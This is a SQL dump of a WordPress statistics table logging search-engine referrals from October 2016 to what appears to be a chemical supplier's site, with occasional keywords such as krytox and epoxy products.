INSERT INTO `wp_statistics_search` VALUES (2063, '2016-10-19', 'google', 'www.google.com', '', 6484); 
INSERT INTO `wp_statistics_search` VALUES (2064, '2016-10-19', 'google', 'www.google.com', '', 6487); 
INSERT INTO `wp_statistics_search` VALUES (2065, '2016-10-19', 'google', 'www.google.com', '', 6488); 
INSERT INTO `wp_statistics_search` VALUES (2066, '2016-10-19', 'google', 'www.google.com', '', 6489); 
INSERT INTO `wp_statistics_search` VALUES (2067, '2016-10-19', 'google', 'www.google.pl', '', 6490); 
INSERT INTO `wp_statistics_search` VALUES (2068, '2016-10-19', 'google', 'www.google.com', '', 6491); 
INSERT INTO `wp_statistics_search` VALUES (2069, '2016-10-19', 'bing', 'www.bing.com', 'concrete resin', 6497); 
INSERT INTO `wp_statistics_search` VALUES (2070, '2016-10-19', 'google', 'www.google.com', '', 6501); 
INSERT INTO `wp_statistics_search` VALUES (2071, '2016-10-19', 'google', 'www.google.ca', '', 6503); 
INSERT INTO `wp_statistics_search` VALUES (2072, '2016-10-19', 'google', 'www.google.com', '', 6507); 
INSERT INTO `wp_statistics_search` VALUES (2073, '2016-10-19', 'google', 'www.google.com', '', 6508); 
INSERT INTO `wp_statistics_search` VALUES (2074, '2016-10-19', 'google', 'www.google.nl', '', 6509); 
INSERT INTO `wp_statistics_search` VALUES (2075, '2016-10-19', 'google', 'www.google.com', '', 6510); 
INSERT INTO `wp_statistics_search` VALUES (2076, '2016-10-19', 'google', 'www.google.com', '', 6513); 
INSERT INTO `wp_statistics_search` VALUES (2077, '2016-10-19', 'google', 'www.google.com', '', 6514); 
INSERT INTO `wp_statistics_search` VALUES (2078, '2016-10-19', 'google', 'www.google.com', '', 6515); 
INSERT INTO `wp_statistics_search` VALUES (2079, '2016-10-19', 'google', 'www.google.com', '', 6517); 
INSERT INTO `wp_statistics_search` VALUES (2080, '2016-10-19', 'google', 'www.google.com', '', 6518); 
INSERT INTO `wp_statistics_search` VALUES (2081, '2016-10-19', 'google', 'www.google.com', '', 6520); 
INSERT INTO `wp_statistics_search` VALUES (2082, '2016-10-19', 'google', 'www.google.com', '', 6522); 
INSERT INTO `wp_statistics_search` VALUES (2083, '2016-10-19', 'google', 'www.google.com.uy', '', 6524); 
INSERT INTO `wp_statistics_search` VALUES (2084, '2016-10-19', 'google', 'www.google.com', '', 6525); 
INSERT INTO `wp_statistics_search` VALUES (2085, '2016-10-19', 'bing', 'www.bing.com', '', 6527); 
INSERT INTO `wp_statistics_search` VALUES (2086, '2016-10-19', 'google', 'www.google.com', '', 6529); 
INSERT INTO `wp_statistics_search` VALUES (2087, '2016-10-19', 'google', 'www.google.co.uk', '', 6532); 
INSERT INTO `wp_statistics_search` VALUES (2088, '2016-10-19', 'google', 'www.google.com', '', 6533); 
INSERT INTO `wp_statistics_search` VALUES (2089, '2016-10-19', 'google', 'www.google.com', '', 6536); 
INSERT INTO `wp_statistics_search` VALUES (2090, '2016-10-19', 'google', 'www.google.es', '', 6538); 
INSERT INTO `wp_statistics_search` VALUES (2091, '2016-10-19', 'google', 'www.google.com', '', 6539); 
INSERT INTO `wp_statistics_search` VALUES (2092, '2016-10-19', 'google', 'www.google.com', '', 6543); 
INSERT INTO `wp_statistics_search` VALUES (2093, '2016-10-19', 'google', 'www.google.com', '', 6546); 
INSERT INTO `wp_statistics_search` VALUES (2094, '2016-10-19', 'google', 'www.google.com', '', 6547); 
INSERT INTO `wp_statistics_search` VALUES (2095, '2016-10-19', 'google', 'www.google.com', '', 6548); 
INSERT INTO `wp_statistics_search` VALUES (2096, '2016-10-19', 'google', 'www.google.com', '', 6549); 
INSERT INTO `wp_statistics_search` VALUES (2097, '2016-10-19', 'google', 'www.google.com.mx', '', 6566); 
INSERT INTO `wp_statistics_search` VALUES (2098, '2016-10-19', 'google', 'www.google.com.mx', '', 6567); 
INSERT INTO `wp_statistics_search` VALUES (2099, '2016-10-19', 'google', 'www.google.nl', '', 6573); 
INSERT INTO `wp_statistics_search` VALUES (2100, '2016-10-19', 'google', 'www.google.nl', '', 6574); 
INSERT INTO `wp_statistics_search` VALUES (2101, '2016-10-20', 'google', 'www.google.com', '', 6589); 
INSERT INTO `wp_statistics_search` VALUES (2102, '2016-10-20', 'google', 'www.google.com.pk', '', 6594); 
INSERT INTO `wp_statistics_search` VALUES (2103, '2016-10-20', 'google', 'www.google.ca', '', 6597); 
INSERT INTO `wp_statistics_search` VALUES (2104, '2016-10-20', 'google', 'www.google.com', '', 6603); 
INSERT INTO `wp_statistics_search` VALUES (2105, '2016-10-20', 'google', 'www.google.com', '', 6607); 
INSERT INTO `wp_statistics_search` VALUES (2106, '2016-10-20', 'google', 'www.google.com', 'krytox', 6611); 
INSERT INTO `wp_statistics_search` VALUES (2107, '2016-10-20', 'google', 'www.google.com', '', 6613); 
INSERT INTO `wp_statistics_search` VALUES (2108, '2016-10-20', 'google', 'www.google.com', '', 6636); 
INSERT INTO `wp_statistics_search` VALUES (2109, '2016-10-20', 'google', 'www.google.com', '', 6651); 
INSERT INTO `wp_statistics_search` VALUES (2110, '2016-10-20', 'google', 'www.google.ca', '', 6652); 
INSERT INTO `wp_statistics_search` VALUES (2111, '2016-10-20', 'google', 'www.google.com', '', 6656); 
INSERT INTO `wp_statistics_search` VALUES (2112, '2016-10-20', 'google', 'www.google.com.tw', '', 6662); 
INSERT INTO `wp_statistics_search` VALUES (2113, '2016-10-20', 'google', 'www.google.pl', '', 6669); 
INSERT INTO `wp_statistics_search` VALUES (2114, '2016-10-20', 'google', 'www.google.co.in', '', 6680); 
INSERT INTO `wp_statistics_search` VALUES (2115, '2016-10-20', 'google', 'www.google.com.sg', '', 6684); 
INSERT INTO `wp_statistics_search` VALUES (2116, '2016-10-20', 'google', 'www.google.co.kr', '', 6686); 
INSERT INTO `wp_statistics_search` VALUES (2117, '2016-10-20', 'yandex', 'yandex.ru', '', 6689); 
INSERT INTO `wp_statistics_search` VALUES (2118, '2016-10-20', 'google', 'www.google.com', '', 6694); 
INSERT INTO `wp_statistics_search` VALUES (2119, '2016-10-20', 'bing', 'cn.bing.com', 'MS-111 epoxy stripper', 6703); 
INSERT INTO `wp_statistics_search` VALUES (2120, '2016-10-20', 'google', 'www.google.it', '', 6704); 
INSERT INTO `wp_statistics_search` VALUES (2121, '2016-10-20', 'google', 'www.google.com', '', 6707); 
INSERT INTO `wp_statistics_search` VALUES (2122, '2016-10-20', 'google', 'www.google.co.in', '', 6709); 
INSERT INTO `wp_statistics_search` VALUES (2123, '2016-10-20', 'google', 'www.google.pl', '', 6714); 
INSERT INTO `wp_statistics_search` VALUES (2124, '2016-10-20', 'google', 'www.google.com', '', 6718); 
INSERT INTO `wp_statistics_search` VALUES (2125, '2016-10-20', 'google', 'www.google.de', '', 6721); 
INSERT INTO `wp_statistics_search` VALUES (2126, '2016-10-20', 'google', 'www.google.com.eg', '', 6727); 
INSERT INTO `wp_statistics_search` VALUES (2127, '2016-10-20', 'google', 'www.google.co.uk', '', 6729); 
INSERT INTO `wp_statistics_search` VALUES (2128, '2016-10-20', 'yandex', 'yandex.ru', '', 6735); 
INSERT INTO `wp_statistics_search` VALUES (2129, '2016-10-20', 'bing', 'cn.bing.com', 'heloxy 48', 6736); 
INSERT INTO `wp_statistics_search` VALUES (2130, '2016-10-20', 'google', 'www.google.ch', '', 6739); 
INSERT INTO `wp_statistics_search` VALUES (2131, '2016-10-20', 'google', 'www.google.com', '', 6742); 
INSERT INTO `wp_statistics_search` VALUES (2132, '2016-10-20', 'google', 'www.google.co.kr', '', 6750); 
INSERT INTO `wp_statistics_search` VALUES (2133, '2016-10-20', 'google', 'www.google.co.in', '', 6759); 
INSERT INTO `wp_statistics_search` VALUES (2134, '2016-10-20', 'google', 'www.google.com.tr', '', 6904); 
INSERT INTO `wp_statistics_search` VALUES (2135, '2016-10-20', 'google', 'www.google.com.br', '', 6913); 
INSERT INTO `wp_statistics_search` VALUES (2136, '2016-10-20', 'google', 'www.google.com', '', 6921); 
INSERT INTO `wp_statistics_search` VALUES (2137, '2016-10-20', 'bing', 'www.bing.com', '', 6963); 
INSERT INTO `wp_statistics_search` VALUES (2138, '2016-10-20', 'google', 'www.google.com', '', 6980); 
INSERT INTO `wp_statistics_search` VALUES (2139, '2016-10-20', 'google', 'www.google.com', '', 6982); 
INSERT INTO `wp_statistics_search` VALUES (2140, '2016-10-20', 'google', 'www.google.com.tr', '', 7039); 
INSERT INTO `wp_statistics_search` VALUES (2141, '2016-10-20', 'google', 'www.google.com.tr', '', 7040); 
INSERT INTO `wp_statistics_search` VALUES (2142, '2016-10-20', 'google', 'www.google.com.tr', '', 7052); 
INSERT INTO `wp_statistics_search` VALUES (2143, '2016-10-20', 'google', 'www.google.com.tr', '', 7061); 
INSERT INTO `wp_statistics_search` VALUES (2144, '2016-10-20', 'google', 'www.google.com', '', 7092); 
INSERT INTO `wp_statistics_search` VALUES (2145, '2016-10-20', 'google', 'www.google.ca', '', 7093); 
INSERT INTO `wp_statistics_search` VALUES (2146, '2016-10-20', 'google', 'www.google.com', '', 7138); 
INSERT INTO `wp_statistics_search` VALUES (2147, '2016-10-20', 'google', 'www.google.com', '', 7158); 
INSERT INTO `wp_statistics_search` VALUES (2148, '2016-10-20', 'google', 'www.google.tn', '', 7161); 
INSERT INTO `wp_statistics_search` VALUES (2149, '2016-10-20', 'google', 'www.google.com.mx', '', 7174); 
INSERT INTO `wp_statistics_search` VALUES (2150, '2016-10-20', 'google', 'www.google.com.tr', '', 7185); 
INSERT INTO `wp_statistics_search` VALUES (2151, '2016-10-20', 'google', 'www.google.com', '', 7187); 
INSERT INTO `wp_statistics_search` VALUES (2152, '2016-10-20', 'google', 'www.google.com', '', 7192); 
INSERT INTO `wp_statistics_search` VALUES (2153, '2016-10-20', 'bing', 'www.bing.com', '', 7213); 
INSERT INTO `wp_statistics_search` VALUES (2154, '2016-10-20', 'google', 'www.google.com', '', 7235); 
INSERT INTO `wp_statistics_search` VALUES (2155, '2016-10-20', 'google', 'www.google.com', '', 7258); 
INSERT INTO `wp_statistics_search` VALUES (2156, '2016-10-20', 'google', 'www.google.com', '', 7285); 
INSERT INTO `wp_statistics_search` VALUES (2157, '2016-10-20', 'google', 'www.google.com', '', 7294); 
INSERT INTO `wp_statistics_search` VALUES (2158, '2016-10-20', 'google', 'www.google.com', '', 7314); 
INSERT INTO `wp_statistics_search` VALUES (2159, '2016-10-20', 'google', 'www.google.com.mx', '', 7333); 
INSERT INTO `wp_statistics_search` VALUES (2160, '2016-10-20', 'google', 'www.google.com', '', 7342); 
INSERT INTO `wp_statistics_search` VALUES (2161, '2016-10-20', 'google', 'www.google.com', '', 7356); 
INSERT INTO `wp_statistics_search` VALUES (2162, '2016-10-20', 'google', 'www.google.com', '', 7363); 
INSERT INTO `wp_statistics_search` VALUES (2163, '2016-10-20', 'google', 'www.google.com', '', 7412); 
INSERT INTO `wp_statistics_search` VALUES (2164, '2016-10-20', 'google', 'www.google.com', '', 7443); 
INSERT INTO `wp_statistics_search` VALUES (2165, '2016-10-20', 'google', 'www.google.nl', '', 7453); 
INSERT INTO `wp_statistics_search` VALUES (2166, '2016-10-20', 'google', 'www.google.com', '', 7477); 
INSERT INTO `wp_statistics_search` VALUES (2167, '2016-10-20', 'google', 'www.google.ca', '', 7484); 
INSERT INTO `wp_statistics_search` VALUES (2168, '2016-10-20', 'google', 'www.google.com', '', 7488); 
INSERT INTO `wp_statistics_search` VALUES (2169, '2016-10-20', 'google', 'www.google.ca', '', 7501); 
INSERT INTO `wp_statistics_search` VALUES (2170, '2016-10-20', 'google', 'www.google.com', '', 7507); 
INSERT INTO `wp_statistics_search` VALUES (2171, '2016-10-20', 'google', 'www.google.com', '', 7510); 
INSERT INTO `wp_statistics_search` VALUES (2172, '2016-10-20', 'bing', 'www.bing.com', 'epikure 3200', 7540); 
INSERT INTO `wp_statistics_search` VALUES (2173, '2016-10-20', 'google', 'www.google.com', '', 7542); 
INSERT INTO `wp_statistics_search` VALUES (2174, '2016-10-20', 'google', 'www.google.com', '', 7546); 
INSERT INTO `wp_statistics_search` VALUES (2175, '2016-10-20', 'google', 'www.google.com.sg', '', 7576); 
INSERT INTO `wp_statistics_search` VALUES (2176, '2016-10-20', 'google', 'www.google.com', '', 7592); 
INSERT INTO `wp_statistics_search` VALUES (2177, '2016-10-20', 'google', 'www.google.com', '', 7593); 
INSERT INTO `wp_statistics_search` VALUES (2178, '2016-10-20', 'google', 'www.google.com.sg', '', 7598); 
INSERT INTO `wp_statistics_search` VALUES (2179, '2016-10-20', 'google', 'www.google.com', '', 7600); 
INSERT INTO `wp_statistics_search` VALUES (2180, '2016-10-20', 'bing', 'www.bing.com', '', 7621); 
INSERT INTO `wp_statistics_search` VALUES (2181, '2016-10-20', 'google', 'www.google.com', '', 7668); 
INSERT INTO `wp_statistics_search` VALUES (2182, '2016-10-20', 'google', 'www.google.com', '', 7676); 
INSERT INTO `wp_statistics_search` VALUES (2183, '2016-10-20', 'google', 'www.google.com', '', 7693); 
INSERT INTO `wp_statistics_search` VALUES (2184, '2016-10-20', 'google', 'www.google.com', '', 7698); 
INSERT INTO `wp_statistics_search` VALUES (2185, '2016-10-20', 'google', 'www.google.com', '', 7717); 
INSERT INTO `wp_statistics_search` VALUES (2186, '2016-10-20', 'google', 'www.google.com', '', 7722); 
INSERT INTO `wp_statistics_search` VALUES (2187, '2016-10-20', 'google', 'www.google.ca', '', 7728); 
INSERT INTO `wp_statistics_search` VALUES (2188, '2016-10-20', 'google', 'www.google.com', '', 7732); 
INSERT INTO `wp_statistics_search` VALUES (2189, '2016-10-20', 'bing', 'www.bing.com', 'krytox eg 2000 specifications', 7742); 
INSERT INTO `wp_statistics_search` VALUES (2190, '2016-10-20', 'google', 'www.google.com.ph', '', 7746); 
INSERT INTO `wp_statistics_search` VALUES (2191, '2016-10-20', 'google', 'www.google.com', '', 7767); 
INSERT INTO `wp_statistics_search` VALUES (2192, '2016-10-20', 'bing', 'www.bing.com', 'Vazo-52', 7783); 
INSERT INTO `wp_statistics_search` VALUES (2193, '2016-10-20', 'google', 'www.google.ca', '', 7784); 
INSERT INTO `wp_statistics_search` VALUES (2194, '2016-10-20', 'google', 'www.google.com', '', 7821); 
INSERT INTO `wp_statistics_search` VALUES (2195, '2016-10-20', 'google', 'www.google.com.py', '', 7834); 
INSERT INTO `wp_statistics_search` VALUES (2196, '2016-10-20', 'google', 'www.google.com', '', 7836); 
INSERT INTO `wp_statistics_search` VALUES (2197, '2016-10-20', 'google', 'www.google.com', '', 7838); 
INSERT INTO `wp_statistics_search` VALUES (2198, '2016-10-20', 'google', 'www.google.com', '', 7839); 
INSERT INTO `wp_statistics_search` VALUES (2199, '2016-10-20', 'google', 'www.google.com', '', 7845); 
INSERT INTO `wp_statistics_search` VALUES (2200, '2016-10-20', 'google', 'www.google.com', '', 7853); 
INSERT INTO `wp_statistics_search` VALUES (2201, '2016-10-20', 'bing', 'www.bing.com', 'miller-stephenson', 7864); 
INSERT INTO `wp_statistics_search` VALUES (2202, '2016-10-20', 'google', 'www.google.com', '', 7885); 
INSERT INTO `wp_statistics_search` VALUES (2203, '2016-10-20', 'yahoo', 'r.search.yahoo.com', '', 7893); 
INSERT INTO `wp_statistics_search` VALUES (2204, '2016-10-20', 'google', 'www.google.com', '', 7899); 
INSERT INTO `wp_statistics_search` VALUES (2205, '2016-10-20', 'google', 'www.google.com', '', 7900); 
INSERT INTO `wp_statistics_search` VALUES (2206, '2016-10-20', 'google', 'www.google.com', '', 7908); 
INSERT INTO `wp_statistics_search` VALUES (2207, '2016-10-20', 'google', 'www.google.com', '', 7916); 
INSERT INTO `wp_statistics_search` VALUES (2208, '2016-10-20', 'google', 'www.google.com', '', 7957); 
INSERT INTO `wp_statistics_search` VALUES (2209, '2016-10-20', 'google', 'www.google.com', '', 7971); 
INSERT INTO `wp_statistics_search` VALUES (2210, '2016-10-20', 'google', 'www.google.com', '', 7972); 
INSERT INTO `wp_statistics_search` VALUES (2211, '2016-10-20', 'google', 'www.google.com', '', 7978); 
INSERT INTO `wp_statistics_search` VALUES (2212, '2016-10-20', 'google', 'www.google.com', '', 7982); 
INSERT INTO `wp_statistics_search` VALUES (2213, '2016-10-20', 'google', 'www.google.com', '', 8000); 
INSERT INTO `wp_statistics_search` VALUES (2214, '2016-10-20', 'google', 'www.google.com', '', 8010); 
INSERT INTO `wp_statistics_search` VALUES (2215, '2016-10-20', 'bing', 'www.bing.com', 'vazo 52 solubility', 8013); 
INSERT INTO `wp_statistics_search` VALUES (2216, '2016-10-20', 'google', 'www.google.ca', '', 8014); 
INSERT INTO `wp_statistics_search` VALUES (2217, '2016-10-20', 'google', 'www.google.com.br', '', 8015); 
INSERT INTO `wp_statistics_search` VALUES (2218, '2016-10-20', 'google', 'www.google.ca', '', 8023); 
INSERT INTO `wp_statistics_search` VALUES (2219, '2016-10-20', 'bing', 'www.bing.com', 'miller stephenson chemical', 8031); 
INSERT INTO `wp_statistics_search` VALUES (2220, '2016-10-20', 'google', 'www.google.fr', '', 8038); 
INSERT INTO `wp_statistics_search` VALUES (2221, '2016-10-20', 'google', 'www.google.com', '', 8054); 
INSERT INTO `wp_statistics_search` VALUES (2222, '2016-10-20', 'google', 'www.google.com', '', 8057); 
INSERT INTO `wp_statistics_search` VALUES (2223, '2016-10-20', 'google', 'www.google.com', '', 8059); 
INSERT INTO `wp_statistics_search` VALUES (2224, '2016-10-20', 'google', 'www.google.com', '', 8072); 
INSERT INTO `wp_statistics_search` VALUES (2225, '2016-10-20', 'google', 'www.google.com', '', 8095); 
INSERT INTO `wp_statistics_search` VALUES (2226, '2016-10-20', 'bing', 'www.bing.com', 'krytox thread sealant', 8104); 
INSERT INTO `wp_statistics_search` VALUES (2227, '2016-10-20', 'google', 'www.google.com', '', 8105); 
INSERT INTO `wp_statistics_search` VALUES (2228, '2016-10-20', 'google', 'www.google.com', '', 8107); 
INSERT INTO `wp_statistics_search` VALUES (2229, '2016-10-20', 'google', 'www.google.com', '', 8122); 
INSERT INTO `wp_statistics_search` VALUES (2230, '2016-10-20', 'google', 'www.google.com', '', 8130); 
INSERT INTO `wp_statistics_search` VALUES (2231, '2016-10-20', 'google', 'www.google.co.uk', '', 8175); 
INSERT INTO `wp_statistics_search` VALUES (2232, '2016-10-20', 'google', 'www.google.com', '', 8184); 
INSERT INTO `wp_statistics_search` VALUES (2233, '2016-10-20', 'google', 'www.google.com', '', 8195); 
INSERT INTO `wp_statistics_search` VALUES (2234, '2016-10-20', 'google', 'www.google.com', '', 8202); 
INSERT INTO `wp_statistics_search` VALUES (2235, '2016-10-20', 'google', 'www.google.com', '', 8226); 
INSERT INTO `wp_statistics_search` VALUES (2236, '2016-10-20', 'google', 'www.google.ca', '', 8232); 
INSERT INTO `wp_statistics_search` VALUES (2237, '2016-10-20', 'google', 'www.google.com', '', 8254); 
INSERT INTO `wp_statistics_search` VALUES (2238, '2016-10-20', 'google', 'www.google.com', '', 8257); 
INSERT INTO `wp_statistics_search` VALUES (2239, '2016-10-20', 'google', 'www.google.com', '', 8268); 
INSERT INTO `wp_statistics_search` VALUES (2240, '2016-10-20', 'bing', 'www.bing.com', 'MS-460H COATING', 8282); 
INSERT INTO `wp_statistics_search` VALUES (2241, '2016-10-20', 'bing', 'www.bing.com', 'hexion epoxy hardener', 8301); 
INSERT INTO `wp_statistics_search` VALUES (2242, '2016-10-20', 'google', 'www.google.com', '', 8324); 
INSERT INTO `wp_statistics_search` VALUES (2243, '2016-10-20', 'google', 'www.google.com', '', 8328); 
INSERT INTO `wp_statistics_search` VALUES (2244, '2016-10-20', 'google', 'www.google.com', '', 8352); 
INSERT INTO `wp_statistics_search` VALUES (2245, '2016-10-20', 'google', 'www.google.com', '', 8369); 
INSERT INTO `wp_statistics_search` VALUES (2246, '2016-10-20', 'google', 'www.google.com', '', 8370); 
INSERT INTO `wp_statistics_search` VALUES (2247, '2016-10-20', 'google', 'www.google.com', '', 8397); 
INSERT INTO `wp_statistics_search` VALUES (2248, '2016-10-20', 'google', 'www.google.com', '', 8425); 
INSERT INTO `wp_statistics_search` VALUES (2249, '2016-10-20', 'google', 'www.google.com', '', 8439); 
INSERT INTO `wp_statistics_search` VALUES (2250, '2016-10-20', 'google', 'www.google.co.uk', '', 8444); 
INSERT INTO `wp_statistics_search` VALUES (2251, '2016-10-20', 'google', 'www.google.com', '', 8485); 
INSERT INTO `wp_statistics_search` VALUES (2252, '2016-10-20', 'google', 'www.google.com', '', 8487); 
INSERT INTO `wp_statistics_search` VALUES (2253, '2016-10-20', 'google', 'www.google.com', '', 8520); 
INSERT INTO `wp_statistics_search` VALUES (2254, '2016-10-20', 'google', 'www.google.com', '', 8524); 
INSERT INTO `wp_statistics_search` VALUES (2255, '2016-10-20', 'google', 'www.google.com', '', 8556); 
INSERT INTO `wp_statistics_search` VALUES (2256, '2016-10-20', 'yahoo', 'r.search.yahoo.com', '', 8578); 
INSERT INTO `wp_statistics_search` VALUES (2257, '2016-10-20', 'google', 'www.google.com', '', 8605); 
INSERT INTO `wp_statistics_search` VALUES (2258, '2016-10-20', 'google', 'www.google.com', '', 8609); 
INSERT INTO `wp_statistics_search` VALUES (2259, '2016-10-20', 'google', 'www.google.com', '', 8626); 
INSERT INTO `wp_statistics_search` VALUES (2260, '2016-10-20', 'google', 'www.google.com', '', 8651); 
INSERT INTO `wp_statistics_search` VALUES (2261, '2016-10-20', 'google', 'www.google.com', '', 8667); 
INSERT INTO `wp_statistics_search` VALUES (2262, '2016-10-20', 'google', 'www.google.com', '', 8697); 
INSERT INTO `wp_statistics_search` VALUES (2263, '2016-10-20', 'google', 'www.google.com', '', 8748); 
INSERT INTO `wp_statistics_search` VALUES (2264, '2016-10-20', 'google', 'www.google.com', '', 8760); 
INSERT INTO `wp_statistics_search` VALUES (2265, '2016-10-20', 'bing', 'www.bing.com', ' 61 chemical manufacturing companies email contact mail', 8765); 
INSERT INTO `wp_statistics_search` VALUES (2266, '2016-10-20', 'google', 'www.google.ca', '', 8815); 
INSERT INTO `wp_statistics_search` VALUES (2267, '2016-10-20', 'google', 'www.google.com', '', 8822); 
INSERT INTO `wp_statistics_search` VALUES (2268, '2016-10-20', 'google', 'www.google.co.kr', '', 8828); 
INSERT INTO `wp_statistics_search` VALUES (2269, '2016-10-21', 'google', 'www.google.com', '', 8932); 
INSERT INTO `wp_statistics_search` VALUES (2270, '2016-10-21', 'google', 'www.google.com', '', 9006); 
INSERT INTO `wp_statistics_search` VALUES (2271, '2016-10-21', 'google', 'www.google.ca', '', 9019); 
INSERT INTO `wp_statistics_search` VALUES (2272, '2016-10-21', 'google', 'www.google.com', '', 9118); 
INSERT INTO `wp_statistics_search` VALUES (2273, '2016-10-21', 'google', 'www.google.ca', '', 9119); 
INSERT INTO `wp_statistics_search` VALUES (2274, '2016-10-21', 'google', 'www.google.com', '', 9124); 
INSERT INTO `wp_statistics_search` VALUES (2275, '2016-10-21', 'google', 'www.google.com', '', 9134); 
INSERT INTO `wp_statistics_search` VALUES (2276, '2016-10-21', 'google', 'www.google.ca', '', 9135); 
INSERT INTO `wp_statistics_search` VALUES (2277, '2016-10-21', 'google', 'www.google.com', '', 9201); 
INSERT INTO `wp_statistics_search` VALUES (2278, '2016-10-21', 'google', 'www.google.com', '', 9244); 
INSERT INTO `wp_statistics_search` VALUES (2279, '2016-10-21', 'google', 'www.google.com.ec', '', 9300); 
INSERT INTO `wp_statistics_search` VALUES (2280, '2016-10-21', 'google', 'www.google.com', '', 9372); 
INSERT INTO `wp_statistics_search` VALUES (2281, '2016-10-21', 'google', 'www.google.com', '', 9382); 
INSERT INTO `wp_statistics_search` VALUES (2282, '2016-10-21', 'google', 'www.google.com', '', 9449); 
INSERT INTO `wp_statistics_search` VALUES (2283, '2016-10-21', 'google', 'www.google.com.au', '', 9465); 
INSERT INTO `wp_statistics_search` VALUES (2284, '2016-10-21', 'google', 'www.google.de', '', 9471); 
INSERT INTO `wp_statistics_search` VALUES (2285, '2016-10-21', 'bing', 'www.bing.com', ' 32 chemical manufacturing companies email contact mail', 9473); 
INSERT INTO `wp_statistics_search` VALUES (2286, '2016-10-21', 'google', 'www.google.com', '', 9483); 
INSERT INTO `wp_statistics_search` VALUES (2287, '2016-10-21', 'google', 'www.google.com.ph', '', 9488); 
INSERT INTO `wp_statistics_search` VALUES (2288, '2016-10-21', 'google', 'www.google.ca', '', 9509); 
INSERT INTO `wp_statistics_search` VALUES (2289, '2016-10-21', 'google', 'www.google.com', '', 9516); 
INSERT INTO `wp_statistics_search` VALUES (2290, '2016-10-21', 'google', 'www.google.co.in', '', 9533); 
INSERT INTO `wp_statistics_search` VALUES (2291, '2016-10-21', 'google', 'www.google.com', '', 9545); 
INSERT INTO `wp_statistics_search` VALUES (2292, '2016-10-21', 'google', 'www.google.de', '', 9549); 
INSERT INTO `wp_statistics_search` VALUES (2293, '2016-10-21', 'google', 'www.google.fr', '', 9550); 
INSERT INTO `wp_statistics_search` VALUES (2294, '2016-10-21', 'google', 'www.google.com.tw', '', 9555); 
INSERT INTO `wp_statistics_search` VALUES (2295, '2016-10-21', 'google', 'www.google.co.in', '', 9557); 
INSERT INTO `wp_statistics_search` VALUES (2296, '2016-10-21', 'google', 'www.google.co.in', '', 9561); 
INSERT INTO `wp_statistics_search` VALUES (2297, '2016-10-21', 'google', 'www.google.gr', '', 9580); 
INSERT INTO `wp_statistics_search` VALUES (2298, '2016-10-21', 'google', 'www.google.com', '', 9588); 
INSERT INTO `wp_statistics_search` VALUES (2299, '2016-10-21', 'google', 'www.google.de', '', 9590); 
INSERT INTO `wp_statistics_search` VALUES (2300, '2016-10-21', 'google', 'www.google.ca', '', 9593); 
INSERT INTO `wp_statistics_search` VALUES (2301, '2016-10-21', 'google', 'www.google.com.py', '', 9596); 
INSERT INTO `wp_statistics_search` VALUES (2302, '2016-10-21', 'google', 'www.google.com', '', 9602); 
INSERT INTO `wp_statistics_search` VALUES (2303, '2016-10-21', 'google', 'www.google.com', '', 9604); 
INSERT INTO `wp_statistics_search` VALUES (2304, '2016-10-21', 'google', 'www.google.no', '', 9606); 
INSERT INTO `wp_statistics_search` VALUES (2305, '2016-10-21', 'google', 'www.google.com', '', 9617); 
INSERT INTO `wp_statistics_search` VALUES (2306, '2016-10-21', 'google', 'www.google.com.br', '', 9618); 
INSERT INTO `wp_statistics_search` VALUES (2307, '2016-10-21', 'google', 'www.google.com', '', 9623); 
INSERT INTO `wp_statistics_search` VALUES (2308, '2016-10-21', 'google', 'www.google.com', '', 9628); 
INSERT INTO `wp_statistics_search` VALUES (2309, '2016-10-21', 'google', 'www.google.fr', '', 9634); 
INSERT INTO `wp_statistics_search` VALUES (2310, '2016-10-21', 'google', 'www.google.co.in', '', 9636); 
INSERT INTO `wp_statistics_search` VALUES (2311, '2016-10-21', 'google', 'www.google.com', '', 9638); 
INSERT INTO `wp_statistics_search` VALUES (2312, '2016-10-21', 'google', 'www.google.com', '', 9640); 
INSERT INTO `wp_statistics_search` VALUES (2313, '2016-10-21', 'google', 'www.google.lv', '', 9641); 
INSERT INTO `wp_statistics_search` VALUES (2314, '2016-10-21', 'google', 'www.google.co.uk', '', 9643); 
INSERT INTO `wp_statistics_search` VALUES (2315, '2016-10-21', 'google', 'www.google.dk', '', 9644); 
INSERT INTO `wp_statistics_search` VALUES (2316, '2016-10-21', 'google', 'www.google.com', '', 9650); 
INSERT INTO `wp_statistics_search` VALUES (2317, '2016-10-21', 'google', 'www.google.com', '', 9657); 
INSERT INTO `wp_statistics_search` VALUES (2318, '2016-10-21', 'google', 'www.google.com', '', 9659); 
INSERT INTO `wp_statistics_search` VALUES (2319, '2016-10-21', 'google', 'www.google.com', '', 9660); 
INSERT INTO `wp_statistics_search` VALUES (2320, '2016-10-21', 'google', 'www.google.co.uk', '', 9661); 
INSERT INTO `wp_statistics_search` VALUES (2321, '2016-10-21', 'google', 'www.google.com', '', 9664); 
INSERT INTO `wp_statistics_search` VALUES (2322, '2016-10-21', 'google', 'www.google.com.br', '', 9666); 
INSERT INTO `wp_statistics_search` VALUES (2323, '2016-10-21', 'google', 'www.google.com', '', 9672); 
INSERT INTO `wp_statistics_search` VALUES (2324, '2016-10-21', 'google', 'www.google.com', '', 9674); 
INSERT INTO `wp_statistics_search` VALUES (2325, '2016-10-21', 'google', 'www.google.com', '', 9678); 
INSERT INTO `wp_statistics_search` VALUES (2326, '2016-10-21', 'google', 'www.google.com', '', 9679); 
INSERT INTO `wp_statistics_search` VALUES (2327, '2016-10-21', 'google', 'www.google.com', '', 9681); 
INSERT INTO `wp_statistics_search` VALUES (2328, '2016-10-21', 'google', 'www.google.ca', '', 9687); 
INSERT INTO `wp_statistics_search` VALUES (2329, '2016-10-21', 'google', 'www.google.com', '', 9689); 
INSERT INTO `wp_statistics_search` VALUES (2330, '2016-10-21', 'google', 'www.google.com', '', 9692); 
INSERT INTO `wp_statistics_search` VALUES (2331, '2016-10-21', 'google', 'www.google.com.tr', '', 9694); 
INSERT INTO `wp_statistics_search` VALUES (2332, '2016-10-21', 'google', 'www.google.com', '', 9700); 
INSERT INTO `wp_statistics_search` VALUES (2333, '2016-10-21', 'google', 'www.google.com', '', 9701); 
INSERT INTO `wp_statistics_search` VALUES (2334, '2016-10-21', 'google', 'www.google.com', '', 9702); 
INSERT INTO `wp_statistics_search` VALUES (2335, '2016-10-21', 'google', 'www.google.ca', '', 9711); 
INSERT INTO `wp_statistics_search` VALUES (2336, '2016-10-21', 'google', 'www.google.hu', '', 9712); 
INSERT INTO `wp_statistics_search` VALUES (2337, '2016-10-21', 'google', 'www.google.ca', '', 9715); 
INSERT INTO `wp_statistics_search` VALUES (2338, '2016-10-21', 'google', 'www.google.com', '', 9722); 
